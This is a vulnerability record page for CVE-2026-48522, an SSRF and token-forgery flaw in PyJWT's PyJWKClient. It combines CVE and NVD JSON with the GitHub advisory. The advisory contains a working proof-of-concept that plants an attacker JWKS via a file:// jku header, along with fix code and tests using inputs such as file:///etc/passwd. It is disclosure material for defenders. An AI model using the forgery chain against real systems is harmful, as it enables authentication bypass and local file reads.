CVE-2026-48522 (GCVE-0-2026-48522)
Vulnerability from cvelistv5 – Published: 2026-05-28 15:00 – Updated: 2026-06-02 15:47
| URL | Tags |
|---|---|
| https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4 | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-48522",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-02T15:47:07.542817Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-02T15:47:49.649Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "pyjwt",
"vendor": "jpadilla",
"versions": [
{
"status": "affected",
"version": "\u003c 2.13.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib\u0027s default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application\u0027s jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \"plant a JWKS to forge tokens\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-441",
"description": "CWE-441: Unintended Proxy or Intermediary (\u0027Confused Deputy\u0027)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "CWE-918: Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-05-28T15:00:30.186Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4"
}
],
"source": {
"advisory": "GHSA-993g-76c3-p5m4",
"discovery": "UNKNOWN"
},
"title": "PyJWKClient: missing scheme allowlist enables SSRF + token forgery via file://, ftp://, data: schemes"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-48522",
"datePublished": "2026-05-28T15:00:30.186Z",
"dateReserved": "2026-05-21T16:18:10.619Z",
"dateUpdated": "2026-06-02T15:47:49.649Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-48522",
"date": "2026-06-18",
"epss": "0.00148",
"percentile": "0.04366"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2026-48522\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-05-28T16:16:29.150\",\"lastModified\":\"2026-06-02T17:16:35.877\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib\u0027s default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application\u0027s jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \\\"plant a JWKS to forge tokens\\\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. 
This vulnerability is fixed in 2.13.0.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\",\"baseScore\":4.2,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":1.6,\"impactScore\":2.5}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-441\"},{\"lang\":\"en\",\"value\":\"CWE-918\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:pyjwt_project:pyjwt:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"2.13.0\",\"matchCriteriaId\":\"2692B308-E3F9-4586-AD28-F64C14358242\"}]}]}],\"references\":[{\"url\":\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"tags\":[\"Exploit\",\"Mitigation\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-48522\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-02T15:47:07.542817Z\"}}}], \"references\": [{\"url\": \"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-02T15:45:52.539Z\"}}], \"cna\": {\"title\": \"PyJWKClient: missing scheme allowlist enables SSRF + token forgery via file://, ftp://, data: schemes\", \"source\": {\"advisory\": \"GHSA-993g-76c3-p5m4\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 4.2, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"LOW\"}}], \"affected\": [{\"vendor\": \"jpadilla\", \"product\": \"pyjwt\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 2.13.0\"}]}], \"references\": [{\"url\": \"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\", \"name\": \"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"PyJWT is a JSON Web Token implementation in Python. 
Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib\u0027s default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application\u0027s jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \\\"plant a JWKS to forge tokens\\\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-441\", \"description\": \"CWE-441: Unintended Proxy or Intermediary (\u0027Confused Deputy\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-918\", \"description\": \"CWE-918: Server-Side Request Forgery (SSRF)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-05-28T15:00:30.186Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-48522\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-02T15:47:49.649Z\", \"dateReserved\": \"2026-05-21T16:18:10.619Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-05-28T15:00:30.186Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-48522
Vulnerability from fkie_nvd - Published: 2026-05-28 16:16 - Updated: 2026-06-17 10:55
| Source | URL | Tags |
|---|---|---|
| security-advisories@github.com | https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4 | Exploit, Mitigation, Vendor Advisory |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4 | Exploit, Mitigation, Vendor Advisory |
| Vendor | Product | Version |
|---|---|---|
| pyjwt_project | pyjwt | * |
{
"affected": [
{
"affectedData": [
{
"product": "pyjwt",
"vendor": "jpadilla",
"versions": [
{
"status": "affected",
"version": "\u003c 2.13.0"
}
]
}
],
"source": "security-advisories@github.com"
}
],
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pyjwt_project:pyjwt:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2692B308-E3F9-4586-AD28-F64C14358242",
"versionEndExcluding": "2.13.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "PyJWT is a JSON Web Token implementation in Python. Prior to 2.13.0, PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib\u0027s default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch. If an application\u0027s jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can cause PyJWKClient to read arbitrary local files via file:// (SSRF on local filesystem), cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface), or forge tokens that PyJWT verifies as valid. The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \"plant a JWKS to forge tokens\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. This vulnerability is fixed in 2.13.0."
}
],
"id": "CVE-2026-48522",
"lastModified": "2026-06-17T10:55:03.530",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 4.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.6,
"impactScore": 2.5,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-48522",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "no"
},
{
"technicalImpact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-02T15:47:07.542817Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-05-28T16:16:29.150",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-441"
},
{
"lang": "en",
"value": "CWE-918"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-993G-76C3-P5M4
Vulnerability from github – Published: 2026-06-15 19:28 – Updated: 2026-06-15 19:28
> [!NOTE] The library does not directly return non-HTTP(S) URI contents to the attacker; the chained "plant a JWKS to forge tokens" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. Severity is scored for the scheme-acceptance bug in isolation.
Summary
PyJWKClient passes its uri argument directly to urllib.request.urlopen() which uses Python stdlib's default OpenerDirector registering HTTPHandler, HTTPSHandler, FTPHandler, FileHandler, and DataHandler. There is currently no documented option to restrict which schemes PyJWKClient will fetch.
If an application's jku URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can:
- Cause PyJWKClient to read arbitrary local files via `file://` (SSRF on local filesystem) — the file's contents are passed to `json.load`.
- Cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface).
- Forge tokens that PyJWT verifies as valid — if the attacker can write to any path the JKU URL points at AND influences the URL, they can plant a JWK Set containing their own public key, sign tokens with the matching private key, and `jwt.decode()` accepts.
Affected versions
Tested and reproducible on PyJWT 2.11.0 and 2.12.1. Likely all versions back to PyJWKClient introduction.
Reproducer (full attack chain — verified empirically)
import jwt as pyjwt
from jwt import PyJWKClient
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives import serialization
import json, base64, time
# Attacker generates keypair (no relation to real IdP)
# The key is never registered with any real identity provider; the chain
# only works because the application later loads the attacker's own JWKS.
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
# Public modulus; encoded below as the JWK "n" member of the planted key set.
pub_n = key.public_key().public_numbers().n
def b64u(n):
    """Base64url-encode a non-negative integer without padding.

    The integer is serialised as a minimal big-endian byte string (an empty
    string for 0), which is how JWK represents RSA parameters such as ``n``.
    """
    byte_len = (n.bit_length() + 7) // 8
    raw = n.to_bytes(byte_len, "big")
    encoded = base64.urlsafe_b64encode(raw).rstrip(b"=")
    return encoded.decode()
# Attacker writes JWK Set containing their public key to /tmp
# Application-layer precondition 1: the attacker must already be able to
# write a file at a path the jku URL will later point to (the advisory
# notes the library fix does not address this).
jwks = {"keys":[{"kty":"RSA","kid":"attacker","use":"sig","alg":"RS256",
        "n":b64u(pub_n),"e":"AQAB"}]}
with open("/tmp/attacker.json","w") as f:
    json.dump(jwks, f)
# Attacker mints token signed with their private key, jku=file://
# The kid matches the planted JWK so key lookup by kid succeeds.
priv_pem = key.private_bytes(serialization.Encoding.PEM,
    serialization.PrivateFormat.PKCS8, serialization.NoEncryption())
now = int(time.time())
token = pyjwt.encode(
    {"sub":"attacker","aud":"target-app","iat":now,"exp":now+3600},
    priv_pem, algorithm="RS256",
    headers={"kid":"attacker","jku":"file:///tmp/attacker.json","typ":"JWT"})
# Vulnerable application pattern: caller derives jku from token header
# and passes to PyJWKClient without scheme validation
# Application-layer precondition 2: the jku is read from the unverified
# header and trusted as-is; the library-side bug is that the scheme of that
# URL is never checked before urlopen().
header = pyjwt.get_unverified_header(token)
client = PyJWKClient(header["jku"]) # <-- accepts file:// silently
# From 2.13.0 the scheme allowlist raises PyJWKClientError at this point,
# before any fetch of the URI is attempted.
key_obj = client.get_signing_key_from_jwt(token)
decoded = pyjwt.decode(token, key_obj.key, algorithms=["RS256"],
    audience="target-app")
print("Token verified:", decoded)
# Output: Token verified: {'sub': 'attacker', 'aud': 'target-app', ...}
Cross-library evidence — PyJWT is the outlier
The same composition pattern is structurally safe in 4 other mainstream JWT libraries:
| Library | Behavior on `jku=file://...` | Mechanism |
|---|---|---|
| PyJWT 2.12.1 (Python) | Reads file from disk, parses, uses for signature verification | urllib default OpenerDirector includes FileHandler |
| panva/jose 6.2.3 (Node.js) | Refuses pre-fetch | WHATWG fetch() rejects non-http(s) at fetch-spec layer |
| golang-jwt + MicahParks/keyfunc v3.4.0 (Go) | Refuses pre-fetch | http.DefaultTransport only registers http/https |
| Microsoft.IdentityModel.Tokens 8.18.0 (.NET) | Refuses pre-fetch | HttpDocumentRetriever defaults RequireHttps=true |
| Spring Security NimbusJwtDecoder 6.3.4 (Java) | Refuses pre-fetch | URI parser delegation refuses non-http(s) at request build |
PyJWT is the only library of these 5 where the default behavior allows file:// to reach the fetch layer.
Recommended fix
Add allowed_schemes: tuple[str, ...] = ("https", "http") kwarg to PyJWKClient.__init__. Pre-validate URL scheme before invoking urllib.request.urlopen. URLs with disallowed schemes raise PyJWKClientError before any fetch is attempted.
Diff sketch against jwt/jwks_client.py
def __init__(
    self, uri: str,
    cache_keys: bool = False, max_cached_keys: int = 16,
    cache_jwk_set: bool = True, lifespan: float = 300,
    headers: dict[str, Any] | None = None, timeout: float = 30,
    ssl_context: SSLContext | None = None,
    # Default keeps plain http for backwards compatibility; callers that
    # require TLS for the JWKS endpoint should pass ("https",).
    allowed_schemes: tuple[str, ...] = ("https", "http"), # NEW
):
    """...
    :param allowed_schemes: URL schemes the JWKS endpoint is permitted
        to use. Default ``("https", "http")``. Pass ``("https",)`` for
        HTTPS-only operation. URLs with disallowed schemes raise
        ``PyJWKClientError`` before any fetch is attempted.
    """
    # ... existing init code ...
    # NOTE(review): _validate_uri_scheme() reads self.uri, so the existing
    # init code above must have assigned it before this point.
    self.allowed_schemes = allowed_schemes
    # Fail closed at construction time: a URI with a disallowed scheme
    # never reaches urllib.request.urlopen().
    self._validate_uri_scheme()
def _validate_uri_scheme(self) -> None:
    """Reject the configured URI early if its scheme isn't allowed.

    Reads ``self.uri`` and ``self.allowed_schemes``. Raises
    ``PyJWKClientError`` when the URI carries no scheme at all, or a scheme
    outside the allowlist, so that nothing is ever handed to ``urlopen``.
    The scheme comparison is case-insensitive on the URI side.
    """
    from urllib.parse import urlsplit

    allowed = self.allowed_schemes
    scheme = urlsplit(self.uri).scheme.lower()
    if scheme == "":
        raise PyJWKClientError(
            f"PyJWKClient URI '{self.uri}' has no scheme; expected one of "
            f"{allowed!r}")
    if scheme in allowed:
        return
    raise PyJWKClientError(
        f"PyJWKClient URI scheme '{scheme}' is not in allowed_schemes "
        f"{allowed!r}; refusing to fetch from this URL")
Tests to add
def test_pyjwkclient_rejects_file_scheme():
    """A file:// JWKS URI is refused at construction, before any read."""
    with pytest.raises(PyJWKClientError) as excinfo:
        PyJWKClient("file:///etc/passwd")
    assert "not in allowed_schemes" in str(excinfo.value)
def test_pyjwkclient_rejects_ftp_scheme():
    """ftp:// is outside the default allowlist and must raise."""
    ftp_uri = "ftp://example.org/keys.json"
    with pytest.raises(PyJWKClientError):
        PyJWKClient(ftp_uri)
def test_pyjwkclient_rejects_data_scheme():
    """An inline data: URI must not be accepted as a JWKS source."""
    data_uri = 'data:application/json,{"keys":[]}'
    with pytest.raises(PyJWKClientError):
        PyJWKClient(data_uri)
def test_pyjwkclient_caller_can_lock_to_https_only():
    """With allowed_schemes=("https",), a plain http:// endpoint is refused too."""
    https_only = ("https",)
    plain_http_uri = "http://internal.test/jwks.json"
    with pytest.raises(PyJWKClientError):
        PyJWKClient(plain_http_uri, allowed_schemes=https_only)
Compatibility
- Default `allowed_schemes=("https", "http")` preserves backwards compatibility for the overwhelming majority of callers using HTTP/HTTPS JWKS endpoints
- Breaking only for callers using non-HTTP schemes intentionally (vanishingly rare)
- No changes to urllib fetch logic itself — the fix is a pre-validation gate on the configured URI. Because urllib's fetch and redirect handling is untouched, a URL reached by following an HTTP redirect is not re-checked against `allowed_schemes`; deployments that need the allowlist to hold end-to-end should also constrain or disable redirect following at the fetch layer.
Class precedent
This is the same class as CVE-2024-21643 (Apache Jena JKU-trust: attacker-supplied JKU URL fetched without scheme validation). NVD-rated CVSS 7.5.
Prior art (verified 2026-05-06)
Confirmed via live recon (NVD direct, OSV.dev, PyJWT GitHub Security Advisories, issue/PR keyword search, CHANGELOG inspection):
- No existing CVE on PyJWT specifically for PyJWKClient URL scheme handling
- No existing GitHub issue or PR addressing scheme allowlisting
- No silent fix in CHANGELOG through 2.12.1
- 5 prior PyJWT advisories (CVE-2017-11424, CVE-2022-29217, CVE-2024-53861, CVE-2025-45768, CVE-2026-32597) — none cover this class
Credit
Reported by Keijo Tuominen — independent security research at CMHT.tech (https://cmht.tech).
Reproduction artifacts available on request: full multi-language probe pack (5 wrappers × 25 fixtures × 125 cells) demonstrating cross-library divergence at the URL-scheme boundary.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 2.12.1"
},
"package": {
"ecosystem": "PyPI",
"name": "PyJWT"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.13.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-48522"
],
"database_specific": {
"cwe_ids": [
"CWE-441",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-15T19:28:41Z",
"nvd_published_at": "2026-05-28T16:16:29Z",
"severity": "MODERATE"
},
"details": "\u003e [!NOTE]\n\u003e The library does not directly return non-HTTP(S) URI contents to the attacker; the chained \"plant a JWKS to forge tokens\" scenario described in the original report requires additional application-layer flaws (attacker write access to a filesystem path, untrusted jku derivation) that this fix does not address. Severity is scored for the scheme-acceptance bug in isolation.\n\n## Summary\n\nPyJWKClient passes its `uri` argument directly to `urllib.request.urlopen()` which uses Python stdlib\u0027s default `OpenerDirector` registering `HTTPHandler`, `HTTPSHandler`, `FTPHandler`, **`FileHandler`**, and `DataHandler`. There is currently no documented option to restrict which schemes PyJWKClient will fetch.\n\nIf an application\u0027s `jku` URL ingestion path accepts attacker-influenced URLs (e.g., from JWT header, configuration file, OAuth flow parameter), the attacker can:\n\n1. Cause PyJWKClient to read arbitrary local files via `file://` (SSRF on local filesystem) \u2014 the file\u0027s contents are passed to `json.load`.\n2. Cause PyJWKClient to attempt FTP / data-URI fetches (broader SSRF surface).\n3. **Forge tokens that PyJWT verifies as valid** \u2014 if the attacker can write to any path the JKU URL points at AND influences the URL, they can plant a JWK Set containing their own public key, sign tokens with the matching private key, and `jwt.decode()` accepts.\n\n## Affected versions\n\nTested and reproducible on **PyJWT 2.11.0 and 2.12.1**. 
Likely all versions back to PyJWKClient introduction.\n\n## Reproducer (full attack chain \u2014 verified empirically)\n\n```python\nimport jwt as pyjwt\nfrom jwt import PyJWKClient\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives import serialization\nimport json, base64, time\n\n# Attacker generates keypair (no relation to real IdP)\nkey = rsa.generate_private_key(public_exponent=65537, key_size=2048)\npub_n = key.public_key().public_numbers().n\n\ndef b64u(n):\n bl = (n.bit_length() + 7) // 8\n return base64.urlsafe_b64encode(n.to_bytes(bl, \u0027big\u0027)).rstrip(b\u0027=\u0027).decode()\n\n# Attacker writes JWK Set containing their public key to /tmp\njwks = {\"keys\":[{\"kty\":\"RSA\",\"kid\":\"attacker\",\"use\":\"sig\",\"alg\":\"RS256\",\n \"n\":b64u(pub_n),\"e\":\"AQAB\"}]}\nwith open(\"/tmp/attacker.json\",\"w\") as f:\n json.dump(jwks, f)\n\n# Attacker mints token signed with their private key, jku=file://\npriv_pem = key.private_bytes(serialization.Encoding.PEM,\n serialization.PrivateFormat.PKCS8, serialization.NoEncryption())\nnow = int(time.time())\ntoken = pyjwt.encode(\n {\"sub\":\"attacker\",\"aud\":\"target-app\",\"iat\":now,\"exp\":now+3600},\n priv_pem, algorithm=\"RS256\",\n headers={\"kid\":\"attacker\",\"jku\":\"file:///tmp/attacker.json\",\"typ\":\"JWT\"})\n\n# Vulnerable application pattern: caller derives jku from token header\n# and passes to PyJWKClient without scheme validation\nheader = pyjwt.get_unverified_header(token)\nclient = PyJWKClient(header[\"jku\"]) # \u003c-- accepts file:// silently\nkey_obj = client.get_signing_key_from_jwt(token)\ndecoded = pyjwt.decode(token, key_obj.key, algorithms=[\"RS256\"],\n audience=\"target-app\")\nprint(\"Token verified:\", decoded)\n# Output: Token verified: {\u0027sub\u0027: \u0027attacker\u0027, \u0027aud\u0027: \u0027target-app\u0027, ...}\n```\n\n## Cross-library evidence \u2014 PyJWT is the outlier\n\nThe same composition pattern is 
structurally safe in 4 other mainstream JWT libraries:\n\n| Library | Behavior on `jku=file://...` | Mechanism |\n|---|---|---|\n| **PyJWT 2.12.1** (Python) | **Reads file from disk, parses, uses for signature verification** | urllib default OpenerDirector includes FileHandler |\n| panva/jose 6.2.3 (Node.js) | Refuses pre-fetch | WHATWG `fetch()` rejects non-http(s) at fetch-spec layer |\n| golang-jwt + MicahParks/keyfunc v3.4.0 (Go) | Refuses pre-fetch | `http.DefaultTransport` only registers http/https |\n| Microsoft.IdentityModel.Tokens 8.18.0 (.NET) | Refuses pre-fetch | `HttpDocumentRetriever` defaults `RequireHttps=true` |\n| Spring Security NimbusJwtDecoder 6.3.4 (Java) | Refuses pre-fetch | URI parser delegation refuses non-http(s) at request build |\n\nPyJWT is the only library of these 5 where the default behavior allows `file://` to reach the fetch layer.\n\n## Recommended fix\n\nAdd `allowed_schemes: tuple[str, ...] = (\"https\", \"http\")` kwarg to `PyJWKClient.__init__`. Pre-validate URL scheme before invoking `urllib.request.urlopen`. URLs with disallowed schemes raise `PyJWKClientError` before any fetch is attempted.\n\n### Diff sketch against `jwt/jwks_client.py`\n\n```python\ndef __init__(\n self, uri: str,\n cache_keys: bool = False, max_cached_keys: int = 16,\n cache_jwk_set: bool = True, lifespan: float = 300,\n headers: dict[str, Any] | None = None, timeout: float = 30,\n ssl_context: SSLContext | None = None,\n allowed_schemes: tuple[str, ...] = (\"https\", \"http\"), # NEW\n):\n \"\"\"...\n :param allowed_schemes: URL schemes the JWKS endpoint is permitted\n to use. Default ``(\"https\", \"http\")``. Pass ``(\"https\",)`` for\n HTTPS-only operation. URLs with disallowed schemes raise\n ``PyJWKClientError`` before any fetch is attempted.\n \"\"\"\n # ... 
existing init code ...\n self.allowed_schemes = allowed_schemes\n self._validate_uri_scheme()\n\n\ndef _validate_uri_scheme(self) -\u003e None:\n \"\"\"Reject the configured URI early if its scheme isn\u0027t allowed.\"\"\"\n from urllib.parse import urlparse\n parsed = urlparse(self.uri)\n scheme = parsed.scheme.lower()\n if not scheme:\n raise PyJWKClientError(\n f\"PyJWKClient URI \u0027{self.uri}\u0027 has no scheme; expected one of \"\n f\"{self.allowed_schemes!r}\")\n if scheme not in self.allowed_schemes:\n raise PyJWKClientError(\n f\"PyJWKClient URI scheme \u0027{scheme}\u0027 is not in allowed_schemes \"\n f\"{self.allowed_schemes!r}; refusing to fetch from this URL\")\n```\n\n### Tests to add\n\n```python\ndef test_pyjwkclient_rejects_file_scheme():\n with pytest.raises(PyJWKClientError, match=\"not in allowed_schemes\"):\n PyJWKClient(\"file:///etc/passwd\")\n\ndef test_pyjwkclient_rejects_ftp_scheme():\n with pytest.raises(PyJWKClientError):\n PyJWKClient(\"ftp://example.org/keys.json\")\n\ndef test_pyjwkclient_rejects_data_scheme():\n with pytest.raises(PyJWKClientError):\n PyJWKClient(\u0027data:application/json,{\"keys\":[]}\u0027)\n\ndef test_pyjwkclient_caller_can_lock_to_https_only():\n with pytest.raises(PyJWKClientError):\n PyJWKClient(\"http://internal.test/jwks.json\", allowed_schemes=(\"https\",))\n```\n\n### Compatibility\n\n- Default `allowed_schemes=(\"https\", \"http\")` preserves backwards compatibility for the 